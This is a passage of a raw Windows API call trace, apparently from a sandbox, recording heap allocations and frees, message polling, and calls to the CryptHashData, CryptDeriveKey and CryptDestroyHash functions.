(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0076.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43ca8b0 [0076.540] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca8b0, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.540] CryptHashData (hHash=0x41ac540, pbData=0x17e2788, dwDataLen=0x22, dwFlags=0x1) returned 1 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0076.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797028 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9a40 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0076.542] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.542] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0076.542] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0076.543] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0076.543] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0076.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0076.544] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0076.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43ca760 [0076.545] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca760, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0076.545] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac540, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac200) returned 1 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0076.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9c68 [0076.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0076.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0076.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0076.546] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.546] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0076.546] CryptDestroyHash (hHash=0x41ac540) returned 1 [0076.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0076.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0076.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0076.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0076.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0076.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0076.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0076.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0076.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0076.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0076.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.548] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0076.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0076.548] 